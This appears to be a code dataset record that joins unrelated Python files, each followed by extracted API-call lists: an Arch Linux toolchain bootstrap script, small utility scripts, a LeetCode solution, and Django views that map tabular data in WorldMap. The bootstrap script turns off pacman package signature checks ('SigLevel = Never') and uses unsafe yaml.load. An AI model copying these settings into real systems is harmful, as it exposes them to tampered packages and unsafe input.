] | [((551, 596), 'wikimetrics.models.SumAggregateByUserReport', 'SumAggregateByUserReport', (['self.cohort', 'metric'], {}), '(self.cohort, metric)\n', (575, 596), False, 'from wikimetrics.models import SumAggregateByUserReport\n'), ((1160, 1200), 'nose.tools.assert_true', 'assert_true', (['(Aggregation.SUM in finished)'], {}), '(Aggregation.SUM in finished)\n', (1171, 1200), False, 'from nose.tools import assert_equals, assert_true\n'), ((1209, 1274), 'nose.tools.assert_true', 'assert_true', (["('rolling_active_editor' in finished[Aggregation.SUM])"], {}), "('rolling_active_editor' in finished[Aggregation.SUM])\n", (1220, 1274), False, 'from nose.tools import assert_equals, assert_true\n'), ((1283, 1351), 'nose.tools.assert_equals', 'assert_equals', (["finished[Aggregation.SUM]['rolling_active_editor']", '(2)'], {}), "(finished[Aggregation.SUM]['rolling_active_editor'], 2)\n", (1296, 1351), False, 'from nose.tools import assert_equals, assert_true\n'), ((1463, 1508), 'wikimetrics.models.SumAggregateByUserReport', 'SumAggregateByUserReport', (['self.cohort', 'metric'], {}), '(self.cohort, metric)\n', (1487, 1508), False, 'from wikimetrics.models import SumAggregateByUserReport\n'), ((2072, 2112), 'nose.tools.assert_true', 'assert_true', (['(Aggregation.SUM in finished)'], {}), '(Aggregation.SUM in finished)\n', (2083, 2112), False, 'from nose.tools import assert_equals, assert_true\n'), ((2121, 2186), 'nose.tools.assert_true', 'assert_true', (["('rolling_active_editor' in finished[Aggregation.SUM])"], {}), "('rolling_active_editor' in finished[Aggregation.SUM])\n", (2132, 2186), False, 'from nose.tools import assert_equals, assert_true\n'), ((2195, 2263), 'nose.tools.assert_equals', 'assert_equals', (["finished[Aggregation.SUM]['rolling_active_editor']", '(0)'], {}), "(finished[Aggregation.SUM]['rolling_active_editor'], 0)\n", (2208, 2263), False, 'from nose.tools import assert_equals, assert_true\n'), ((638, 666), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(1)', '"""enwiki"""', '(12)'], {}), "(1, 'enwiki', 12)\n", (649, 666), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((688, 716), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(2)', '"""dewiki"""', '(12)'], {}), "(2, 'dewiki', 12)\n", (699, 716), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((738, 766), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(3)', '"""frwiki"""', '(12)'], {}), "(3, 'frwiki', 12)\n", (749, 766), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((788, 816), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(4)', '"""ptwiki"""', '(12)'], {}), "(4, 'ptwiki', 12)\n", (799, 816), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1550, 1578), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(1)', '"""enwiki"""', '(12)'], {}), "(1, 'enwiki', 12)\n", (1561, 1578), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1600, 1628), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(2)', '"""dewiki"""', '(12)'], {}), "(2, 'dewiki', 12)\n", (1611, 1628), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1650, 1678), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(3)', '"""frwiki"""', '(12)'], {}), "(3, 'frwiki', 12)\n", (1661, 1678), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n'), ((1700, 1728), 'wikimetrics.models.storage.wikiuser.WikiUserKey', 'WikiUserKey', (['(4)', '"""ptwiki"""', '(12)'], {}), "(4, 'ptwiki', 12)\n", (1711, 1728), False, 'from wikimetrics.models.storage.wikiuser import WikiUserKey\n')] |
#!/usr/bin/env python3
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from utilities import get_argparser, log, timestamp, run_cmd
from utilities import recursive_chown
import codecs
import jinja2
from glob import glob
import json
import os
import os.path
import re
import setup
import shutil
import subprocess
import tarfile
import urllib.request
import tempfile
import yaml
def main():
"""Install vanilla bootstrap packages from local mirror.
Installing all the bootstrap packages is a lengthy (and highly
disk-IO bound, thus serializing) procedure, so it's best to do it
only once. Instead of having each container running the make_package
stage installing the boostrap packages, we install the bootstrap
packages in this container and then base the make_package containers
on the image of this container.
"""
parser = get_argparser()
args = parser.parse_args()
# GPG takes time. Remove package signature checks.
lines = []
with open("/etc/pacman.conf") as f:
for line in f:
if re.search("SigLevel", line):
lines.append("SigLevel = Never")
else:
lines.append(line.strip())
with open("/etc/pacman.conf", "w") as f:
for line in lines:
print(line.strip(), file=f)
name_data_file = os.path.join(args.shared_directory,
"get_base_package_names", "latest", "names.json")
with open(name_data_file) as f:
name_data = json.load(f)
bootstrap_packs = (name_data["base"]
+ name_data["base_devel"]
+ name_data["tools"]
+ ["sloccount"])
cmd = "pacman -S --needed --noconfirm %s" % " ".join(set(bootstrap_packs))
proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, _ = proc.communicate()
out = codecs.decode(out, errors="replace")
if proc.returncode:
log("die", cmd, out.splitlines())
exit(1)
else:
log("command", cmd, out.splitlines())
# When building red, we need to supply it with a list of defines
# suitable for this toolchain. Construct those defines here and
# write out the PKGBUILD with those defines.
with open("/build/tool_redirect_rules.yaml") as f:
transforms = yaml.load(f)
log("info", "Before rules %s" % yaml.dump(transforms, default_flow_style=False))
for tool in transforms["overwrite"]:
transforms["replacements"][tool] = tool
log("info", "After rules %s" % yaml.dump(transforms, default_flow_style=False))
defines = []
for tool, replacement in transforms["replacements"].items():
# The tool & replacement will be written just like the name of
# the tool binary, e.g. "scan-view", "clang++", etc. These are
# not valid identifiers (because they contain - or +), so the
# libred cmake define variable will write them as SCAN_VIEW and
# CLANGPP. Do that transformation here, but leave the name of
# the original tool intact.
var_name = re.sub("-", "_", tool)
var_name = re.sub("\+\+", "pp", var_name)
var_name = var_name.upper()
path = os.path.join(transforms["bin-dir"],
"%s%s" % (transforms["prefix"], replacement))
defines.append('-DRED_%s="%s"' % (var_name, path))
log("info", "Redirecting %s to %s" % (var_name, path))
if transforms["bin-dir"]:
defines.append('-DRED_ENSURE_PATH="%s"' % transforms["bin-dir"])
jinja = jinja2.Environment(loader=jinja2.FileSystemLoader(["/build"]))
pkgbuild_temp = jinja.get_template("red-PKGBUILD")
pkgbuild = pkgbuild_temp.render(defines=(" ".join(defines)))
with open("/build/PKGBUILD", "w") as f:
f.write(pkgbuild)
log("info", "Generated PKGBUILD for red", output=pkgbuild.splitlines())
# Build and install red
with tempfile.TemporaryDirectory() as d:
red_tar = os.path.join(d, "red.tar.xz")
with tarfile.open(red_tar, "w:xz") as tar:
tar.add("/red", arcname="red")
shutil.copyfile("/build/PKGBUILD", os.path.join(d, "PKGBUILD"))
shutil.chown(d, user="tuscan")
os.chdir(d)
cmd = "sudo -u tuscan makepkg --nocolor"
cp = subprocess.run(cmd.split(), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True)
if cp.returncode:
log("die", cmd, cp.stdout.splitlines())
exit(1)
else:
log("command", cmd, cp.stdout.splitlines())
package = glob("red*.pkg.tar.xz")
if not len(package) == 1:
log("die", "More than one package found", package)
exit(1)
cmd = "pacman -U --noconfirm %s" % package[0]
cp = subprocess.run(cmd.split(), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True)
if cp.returncode:
log("die", cmd, cp.stdout.splitlines())
exit(1)
else:
log("command", cmd, cp.stdout.splitlines())
if not os.path.isdir("/toolchain_root"):
log("die", "/toolchain_root is not mounted")
exit(1)
if os.listdir("/toolchain_root"):
log("info", ("Skipping toolchain-specific setup as "
"/toolchain_root contains files. Listing:"),
output=list(os.listdir("/toolchain_root")))
else:
log("info", ("/toolchain_root is empty, performing "
"toolchain-specific setup"),
output=list(os.listdir("/toolchain_root")))
setup.toolchain_specific_setup(args)
recursive_chown("/toolchain_root")
exit(0)
if __name__ == "__main__":
main()
| [
"tarfile.open",
"yaml.load",
"setup.toolchain_specific_setup",
"re.search",
"utilities.log",
"codecs.decode",
"os.listdir",
"os.path.isdir",
"utilities.get_argparser",
"glob.glob",
"yaml.dump",
"re.sub",
"tempfile.TemporaryDirectory",
"shutil.chown",
"os.path.join",
"utilities.recursiv... | [((1417, 1432), 'utilities.get_argparser', 'get_argparser', ([], {}), '()\n', (1430, 1432), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((1886, 1975), 'os.path.join', 'os.path.join', (['args.shared_directory', '"""get_base_package_names"""', '"""latest"""', '"""names.json"""'], {}), "(args.shared_directory, 'get_base_package_names', 'latest',\n 'names.json')\n", (1898, 1975), False, 'import os\n'), ((2450, 2486), 'codecs.decode', 'codecs.decode', (['out'], {'errors': '"""replace"""'}), "(out, errors='replace')\n", (2463, 2486), False, 'import codecs\n'), ((5794, 5823), 'os.listdir', 'os.listdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (5804, 5823), False, 'import os\n'), ((6253, 6287), 'utilities.recursive_chown', 'recursive_chown', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (6268, 6287), False, 'from utilities import recursive_chown\n'), ((2041, 2053), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2050, 2053), False, 'import json\n'), ((2889, 2901), 'yaml.load', 'yaml.load', (['f'], {}), '(f)\n', (2898, 2901), False, 'import yaml\n'), ((3656, 3678), 're.sub', 're.sub', (['"""-"""', '"""_"""', 'tool'], {}), "('-', '_', tool)\n", (3662, 3678), False, 'import re\n'), ((3698, 3730), 're.sub', 're.sub', (['"""\\\\+\\\\+"""', '"""pp"""', 'var_name'], {}), "('\\\\+\\\\+', 'pp', var_name)\n", (3704, 3730), False, 'import re\n'), ((3781, 3866), 'os.path.join', 'os.path.join', (["transforms['bin-dir']", "('%s%s' % (transforms['prefix'], replacement))"], {}), "(transforms['bin-dir'], '%s%s' % (transforms['prefix'],\n replacement))\n", (3793, 3866), False, 'import os\n'), ((3959, 4013), 'utilities.log', 'log', (['"""info"""', "('Redirecting %s to %s' % (var_name, path))"], {}), "('info', 'Redirecting %s to %s' % (var_name, path))\n", (3962, 4013), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((4500, 4529), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (4527, 4529), False, 'import tempfile\n'), ((4554, 4583), 'os.path.join', 'os.path.join', (['d', '"""red.tar.xz"""'], {}), "(d, 'red.tar.xz')\n", (4566, 4583), False, 'import os\n'), ((4758, 4788), 'shutil.chown', 'shutil.chown', (['d'], {'user': '"""tuscan"""'}), "(d, user='tuscan')\n", (4770, 4788), False, 'import shutil\n'), ((4797, 4808), 'os.chdir', 'os.chdir', (['d'], {}), '(d)\n', (4805, 4808), False, 'import os\n'), ((5176, 5199), 'glob.glob', 'glob', (['"""red*.pkg.tar.xz"""'], {}), "('red*.pkg.tar.xz')\n", (5180, 5199), False, 'from glob import glob\n'), ((5683, 5715), 'os.path.isdir', 'os.path.isdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (5696, 5715), False, 'import os\n'), ((5725, 5769), 'utilities.log', 'log', (['"""die"""', '"""/toolchain_root is not mounted"""'], {}), "('die', '/toolchain_root is not mounted')\n", (5728, 5769), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((6211, 6247), 'setup.toolchain_specific_setup', 'setup.toolchain_specific_setup', (['args'], {}), '(args)\n', (6241, 6247), False, 'import setup\n'), ((1613, 1640), 're.search', 're.search', (['"""SigLevel"""', 'line'], {}), "('SigLevel', line)\n", (1622, 1640), False, 'import re\n'), ((2939, 2986), 'yaml.dump', 'yaml.dump', (['transforms'], {'default_flow_style': '(False)'}), '(transforms, default_flow_style=False)\n', (2948, 2986), False, 'import yaml\n'), ((3114, 3161), 'yaml.dump', 'yaml.dump', (['transforms'], {'default_flow_style': '(False)'}), '(transforms, default_flow_style=False)\n', (3123, 3161), False, 'import yaml\n'), ((4157, 4192), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (["['/build']"], {}), "(['/build'])\n", (4180, 4192), False, 'import jinja2\n'), ((4597, 4626), 'tarfile.open', 'tarfile.open', (['red_tar', '"""w:xz"""'], {}), "(red_tar, 'w:xz')\n", (4609, 4626), False, 'import tarfile\n'), ((4721, 4748), 'os.path.join', 'os.path.join', (['d', '"""PKGBUILD"""'], {}), "(d, 'PKGBUILD')\n", (4733, 4748), False, 'import os\n'), ((5246, 5296), 'utilities.log', 'log', (['"""die"""', '"""More than one package found"""', 'package'], {}), "('die', 'More than one package found', package)\n", (5249, 5296), False, 'from utilities import get_argparser, log, timestamp, run_cmd\n'), ((5985, 6014), 'os.listdir', 'os.listdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (5995, 6014), False, 'import os\n'), ((6171, 6200), 'os.listdir', 'os.listdir', (['"""/toolchain_root"""'], {}), "('/toolchain_root')\n", (6181, 6200), False, 'import os\n')] |
import argparse
parser = argparse.ArgumentParser(description='Oh Deyu.')
parser.add_argument('-i','--input', help='Input file name',required=True)
parser.add_argument('-o','--output',help='Output file name', required=True)
parser.add_argument('-n','--number',help='numer', required=True)
args = parser.parse_args()
target = open(args.output, 'w')
with open(args.input) as fp:
for line in fp:
if line.strip()==0:
target.write(line)
continue
b = (line.find(">",0,len(line)-4))
if b == -1:
target.write(line)
continue
# print (len(line))
for i in range(2, 10, +1):
numString = (line[b+1:b-len(line)+i])
# print (numString)
if numString.isnumeric() == 0:
break
if(i==2):
target.write(line)
else:
a = line[:b-len(line)+1] + str(int(int(numString[:-1])*float(args.number))) + line[b+i-1:]
target.write(a)
# print (line)
target.close()
| [
"argparse.ArgumentParser"
] | [((26, 73), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Oh Deyu."""'}), "(description='Oh Deyu.')\n", (49, 73), False, 'import argparse\n')] |
from natas import ocr_builder
from mikatools import *
#from gensim.models import Word2Vec
#from gensim.models.keyedvectors import Word2VecKeyedVectors
import natas
print(natas.normalize_words(["seacreat", "wiþe"], n_best=5))
print(natas.ocr_correct_words(["paft", "friendlhip"]))
#print(natas.is_correctly_spelled("cat"))
#print(natas.is_correctly_spelled("ca7"))
#model = Word2Vec.load("/Users/mikahama/Downloads/models/model_fi_1820-1917.w2v")
#model = Word2VecKeyedVectors.load_word2vec_format("/mnt/c/Users/Mika/Downloads/enwiki_20180420_100d.txt")
#print("ok")
#seed_words = set(json_load("natas/wiktionary_lemmas.json"))
#print("ok")
#res = ocr_builder.extract_parallel(seed_words, model, dictionary=seed_words, lemmatize=False, use_freq=False)
#json_dump(res, "test.json")
| [
"natas.ocr_correct_words",
"natas.normalize_words"
] | [((171, 224), 'natas.normalize_words', 'natas.normalize_words', (["['seacreat', 'wiþe']"], {'n_best': '(5)'}), "(['seacreat', 'wiþe'], n_best=5)\n", (192, 224), False, 'import natas\n'), ((232, 279), 'natas.ocr_correct_words', 'natas.ocr_correct_words', (["['paft', 'friendlhip']"], {}), "(['paft', 'friendlhip'])\n", (255, 279), False, 'import natas\n')] |
#!/usr/bin/env python
"""
CREATED AT: 2021/8/17
Des:
https://leetcode.com/problems/count-good-nodes-in-binary-tree/
https://leetcode.com/explore/challenge/card/august-leetcoding-challenge-2021/615/week-3-august-15th-august-21st/3899/
GITHUB: https://github.com/Jiezhi/myleetcode
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
import collections
from tree_node import *
class Solution:
def goodNodes(self, root: TreeNode) -> int:
"""
63 / 63 test cases passed.
Status: Accepted
Runtime: 244 ms
Memory Usage: 31.5 MB
:param root:
:return:
"""
good_nodes = 1
dq = collections.deque()
dq.append(root)
while len(dq) > 0:
node = dq.pop()
if node.left:
if node.val <= node.left.val:
good_nodes += 1
else:
node.left.val = node.val
dq.append(node.left)
if node.right:
if node.val <= node.right.val:
good_nodes += 1
else:
node.right.val = node.val
dq.append(node.right)
return good_nodes
def test():
null = None
assert Solution().goodNodes(build_tree_node([3, 1, 4, 3, null, 1, 5])) == 4
assert Solution().goodNodes(build_tree_node([3, 3, null, 4, 2])) == 3
assert Solution().goodNodes(build_tree_node([1])) == 1
if __name__ == '__main__':
test()
| [
"collections.deque"
] | [((799, 818), 'collections.deque', 'collections.deque', ([], {}), '()\n', (816, 818), False, 'import collections\n')] |
"""
Views to create WorldMap layers by:
- Joining a tabular file to an existing layer OR
- Using Lat/Lng columns for mapping
"""
from django.http import HttpResponse
from django.views.decorators.http import require_POST
from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text
from gc_apps.geo_utils.msg_util import msg, msgt
from gc_apps.gis_basic_file.dataverse_info_service import get_dataverse_info_dict
from gc_apps.gis_tabular.models import TabularFileInfo # for testing
from gc_apps.gis_tabular.models import WorldMapTabularLayerInfo
from gc_apps.gis_tabular.forms import LatLngColumnsForm, ChooseSingleColumnForm
from gc_apps.dv_notify.metadata_updater import MetadataUpdater
from gc_apps.geo_utils.geoconnect_step_names import PANEL_TITLE_MAP_DATA_FILE,\
PANEL_TITLE_STYLE_MAP
from gc_apps.worldmap_connect.utils import get_geocode_types_and_join_layers
from gc_apps.worldmap_connect.lat_lng_service import create_map_from_datatable_lat_lng
from gc_apps.worldmap_connect.table_join_map_maker import TableJoinMapMaker
#from gc_apps.gis_tabular.dataverse_test_info import DataverseTestInfo
from gc_apps.gis_tabular.views import build_map_html
import logging
LOGGER = logging.getLogger(__name__)
@require_POST
def view_map_tabular_file_form(request):
"""
AJAX call: Join your tabular file to an existing WorldMap layer
using the column selected in this form
"""
#for k, v in request.POST.items():
# print k, v
# -----------------------------------------
# Retrieve the id of the Tabular info object
# -----------------------------------------
tabular_file_info_id = request.POST.get('tabular_file_info_id', -1)
try:
tabular_info = TabularFileInfo.objects.get(pk=tabular_file_info_id)
except TabularFileInfo.DoesNotExist:
err_msg = 'Sorry! The Tabular File was not found. (tabular_file_info_id)'
json_msg = MessageHelperJSON.get_json_fail_msg(err_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
#raise Http404('No TabularFileInfo for id: %s' % tabular_file_info_id)
# -----------------------------------------
# Retrieve available Geocode types and join Layers
# note: geocode_types_from_worldmap not needed here
# -----------------------------------------
(geocode_types_from_worldmap, available_layers_list) = get_geocode_types_and_join_layers()
# -----------------------------------------
# Create form with initial + POST data
# -----------------------------------------
form_single_column = ChooseSingleColumnForm(tabular_info.id,\
available_layers_list,\
tabular_info.column_names,\
request.POST)
# -----------------------------------------
# Check the form's validity
# -----------------------------------------
if not form_single_column.is_valid():
json_msg = MessageHelperJSON.get_json_fail_msg(\
format_errors_as_text(form_single_column, for_web=True))
return HttpResponse(json_msg, content_type="application/json", status=200)
#print 'cleaned_data', form_single_column.cleaned_data
# -----------------------------------------
# Get Dataverse info dict
# -----------------------------------------
dataverse_metadata_dict = get_dataverse_info_dict(tabular_info)
# -----------------------------------------
# Use the WorldMap API and
# try to create a layer
# -----------------------------------------
tj_map_maker = TableJoinMapMaker(tabular_info,
dataverse_metadata_dict,
form_single_column.cleaned_data.get('chosen_column'),
form_single_column.cleaned_data.get('chosen_layer'),
)
success = tj_map_maker.run_map_create()
msg('success: %s' % success)
if not success:
json_msg = MessageHelperJSON.get_json_fail_msg(\
'Sorry! ' + tj_map_maker.get_error_msg())
msg('error msg: %s' % json_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
# -----------------------------------------
# Succeeded! Create a WorldMapTabularLayerInfo object
# -----------------------------------------
worldmap_tabular_info = WorldMapTabularLayerInfo.build_from_worldmap_json(tabular_info,\
tj_map_maker.get_map_info())
if worldmap_tabular_info is None:
LOGGER.error("Failed to create WorldMapTabularLayerInfo using %s",\
tj_map_maker.get_map_info())
user_msg = 'Sorry! Failed to create map. Please try again. (code: s1)'
json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
# -----------------------------------------
# Notify Dataverse of the new map
# -----------------------------------------
MetadataUpdater.run_update_via_popen(worldmap_tabular_info)
# -----------------------------------------
# Build the Map HTML chunk to replace the form
# -----------------------------------------
map_html, user_message_html = build_map_html(request, worldmap_tabular_info)
if map_html is None: # Failed! Send an error
LOGGER.error("Failed to create map HTML using WorldMapTabularLayerInfo: %s (%d)",\
worldmap_tabular_info, worldmap_tabular_info.id)
user_msg = 'Sorry! Failed to create map. Please try again. (code: s2)'
json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
# -----------------------------------------
# Looks good. In the JSON response, send
# back the map HTML
# -----------------------------------------
data_dict = dict(map_html=map_html,
user_message_html=user_message_html,
id_main_panel_title=PANEL_TITLE_STYLE_MAP)
json_msg = MessageHelperJSON.get_json_success_msg("great job", data_dict=data_dict)
return HttpResponse(json_msg, content_type="application/json", status=200)
#json_msg = MessageHelperJSON.get_json_success_msg('You got here! (view_map_tabular_file_form)')
#return HttpResponse(json_msg, content_type="application/json", status=200)
@require_POST
def view_process_lat_lng_form(request):
"""
Create a WorldMap layer from your tabular file
using the latitude and longitude columns selected in this form
"""
tabular_file_info_id = request.POST.get('tabular_file_info_id', -1)
try:
tabular_info = TabularFileInfo.objects.get(pk=tabular_file_info_id)
except TabularFileInfo.DoesNotExist:
err_msg = 'Sorry! The Tabular File was not found. (tabular_file_info_id)'
json_msg = MessageHelperJSON.get_json_fail_msg(err_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
#raise Http404('No TabularFileInfo for id: %s' % tabular_file_info_id)
form_lat_lng = LatLngColumnsForm(tabular_info.id,\
tabular_info.column_names,\
request.POST)
if not form_lat_lng.is_valid():
json_msg = MessageHelperJSON.get_json_fail_msg(\
format_errors_as_text(form_lat_lng,\
for_web=True)\
)
#json_msg = MessageHelperJSON.get_json_fail_msg(f.err_msg_for_web)
return HttpResponse(json_msg, content_type="application/json", status=200)
(success, worldmap_data_or_err_msg) = create_map_from_datatable_lat_lng(\
tabular_info,\
form_lat_lng.get_latitude_colname(),\
form_lat_lng.get_longitude_colname(),\
)
# -----------------------------------------
# Failed! Send error message
# -----------------------------------------
if not success:
json_msg = MessageHelperJSON.get_json_fail_msg(\
'Sorry! ' + worldmap_data_or_err_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
# -----------------------------------------
# Succeeded! Create a WorldMapTabularLayerInfo object
# -----------------------------------------
user_msg, response_data = worldmap_data_or_err_msg
#json_msg = MessageHelperJSON.get_json_success_msg(user_msg, data_dict=response_data)
#return HttpResponse(json_msg, content_type="application/json", status=200)
worldmap_latlng_info = WorldMapTabularLayerInfo.build_from_worldmap_json(tabular_info,\
response_data)
if worldmap_latlng_info is None:
LOGGER.error("Failed to create WorldMapLatLngInfo using data: %s",\
response_data)
user_msg = 'Sorry! Failed to create map. Please try again. (code: s4)'
json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
# -----------------------------------------
# Notify Dataverse of the new map
# -----------------------------------------
MetadataUpdater.run_update_via_popen(worldmap_latlng_info)
# -----------------------------------------
# Possible that this failed?
# Make sure at least 1 row mapped
# -----------------------------------------
# Skip for now! Error in row counts for Lat/Lng!
"""
if worldmap_latlng_info.did_any_rows_map() is False:
# Delete the worldmap_latlng_info object
worldmap_latlng_info.delete()
# Send back a user error message
user_msg = "Sorry! We couldn't map any of those latitude and longitude values."
return HttpResponse(MessageHelperJSON.get_json_fail_msg(user_msg),\
content_type="application/json",\
status=200)
"""
# -----------------------------------------
# Build the Map HTML chunk to replace the form
# -----------------------------------------
map_html, user_message_html = build_map_html(request, worldmap_latlng_info)
if map_html is None: # Failed! Send an error
LOGGER.error("Failed to create map HTML using WorldMapLatLngInfo: %s (%d)",\
worldmap_latlng_info, worldmap_latlng_info.id)
user_msg = 'Sorry! Failed to create map. Please try again. (code: s5)'
json_msg = MessageHelperJSON.get_json_fail_msg(user_msg)
return HttpResponse(json_msg, content_type="application/json", status=200)
# -----------------------------------------
# Looks good. In the JSON response, send
# back the map HTML
# -----------------------------------------
data_dict = dict(map_html=map_html,
user_message_html=user_message_html,
id_main_panel_title=PANEL_TITLE_STYLE_MAP)
json_msg = MessageHelperJSON.get_json_success_msg("great job", data_dict=data_dict)
return HttpResponse(json_msg, content_type="application/json", status=200)
| [
"logging.getLogger",
"gc_apps.gis_tabular.models.WorldMapTabularLayerInfo.build_from_worldmap_json",
"gc_apps.dv_notify.metadata_updater.MetadataUpdater.run_update_via_popen",
"gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_success_msg",
"gc_apps.gis_tabular.forms.ChooseSingleColumnForm",
... | [((1230, 1257), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1247, 1257), False, 'import logging\n'), ((2427, 2462), 'gc_apps.worldmap_connect.utils.get_geocode_types_and_join_layers', 'get_geocode_types_and_join_layers', ([], {}), '()\n', (2460, 2462), False, 'from gc_apps.worldmap_connect.utils import get_geocode_types_and_join_layers\n'), ((2628, 2736), 'gc_apps.gis_tabular.forms.ChooseSingleColumnForm', 'ChooseSingleColumnForm', (['tabular_info.id', 'available_layers_list', 'tabular_info.column_names', 'request.POST'], {}), '(tabular_info.id, available_layers_list, tabular_info\n .column_names, request.POST)\n', (2650, 2736), False, 'from gc_apps.gis_tabular.forms import LatLngColumnsForm, ChooseSingleColumnForm\n'), ((3404, 3441), 'gc_apps.gis_basic_file.dataverse_info_service.get_dataverse_info_dict', 'get_dataverse_info_dict', (['tabular_info'], {}), '(tabular_info)\n', (3427, 3441), False, 'from gc_apps.gis_basic_file.dataverse_info_service import get_dataverse_info_dict\n'), ((3927, 3955), 'gc_apps.geo_utils.msg_util.msg', 'msg', (["('success: %s' % success)"], {}), "('success: %s' % success)\n", (3930, 3955), False, 'from gc_apps.geo_utils.msg_util import msg, msgt\n'), ((5051, 5110), 'gc_apps.dv_notify.metadata_updater.MetadataUpdater.run_update_via_popen', 'MetadataUpdater.run_update_via_popen', (['worldmap_tabular_info'], {}), '(worldmap_tabular_info)\n', (5087, 5110), False, 'from gc_apps.dv_notify.metadata_updater import MetadataUpdater\n'), ((5293, 5339), 'gc_apps.gis_tabular.views.build_map_html', 'build_map_html', (['request', 'worldmap_tabular_info'], {}), '(request, worldmap_tabular_info)\n', (5307, 5339), False, 'from gc_apps.gis_tabular.views import build_map_html\n'), ((6109, 6181), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_success_msg', 'MessageHelperJSON.get_json_success_msg', (['"""great job"""'], {'data_dict': 'data_dict'}), "('great job', data_dict=data_dict)\n", (6147, 6181), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((6194, 6261), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (6206, 6261), False, 'from django.http import HttpResponse\n'), ((7162, 7237), 'gc_apps.gis_tabular.forms.LatLngColumnsForm', 'LatLngColumnsForm', (['tabular_info.id', 'tabular_info.column_names', 'request.POST'], {}), '(tabular_info.id, tabular_info.column_names, request.POST)\n', (7179, 7237), False, 'from gc_apps.gis_tabular.forms import LatLngColumnsForm, ChooseSingleColumnForm\n'), ((8713, 8791), 'gc_apps.gis_tabular.models.WorldMapTabularLayerInfo.build_from_worldmap_json', 'WorldMapTabularLayerInfo.build_from_worldmap_json', (['tabular_info', 'response_data'], {}), '(tabular_info, response_data)\n', (8762, 8791), False, 'from gc_apps.gis_tabular.models import WorldMapTabularLayerInfo\n'), ((9337, 9395), 'gc_apps.dv_notify.metadata_updater.MetadataUpdater.run_update_via_popen', 'MetadataUpdater.run_update_via_popen', (['worldmap_latlng_info'], {}), '(worldmap_latlng_info)\n', (9373, 9395), False, 'from gc_apps.dv_notify.metadata_updater import MetadataUpdater\n'), ((10244, 10289), 'gc_apps.gis_tabular.views.build_map_html', 'build_map_html', (['request', 'worldmap_latlng_info'], {}), '(request, worldmap_latlng_info)\n', (10258, 10289), False, 'from gc_apps.gis_tabular.views import build_map_html\n'), ((11052, 11124), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_success_msg', 'MessageHelperJSON.get_json_success_msg', (['"""great job"""'], {'data_dict': 'data_dict'}), "('great job', data_dict=data_dict)\n", (11090, 11124), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((11137, 11204), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (11149, 11204), False, 'from django.http import HttpResponse\n'), ((1756, 1808), 'gc_apps.gis_tabular.models.TabularFileInfo.objects.get', 'TabularFileInfo.objects.get', ([], {'pk': 'tabular_file_info_id'}), '(pk=tabular_file_info_id)\n', (1783, 1808), False, 'from gc_apps.gis_tabular.models import TabularFileInfo\n'), ((3119, 3186), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, 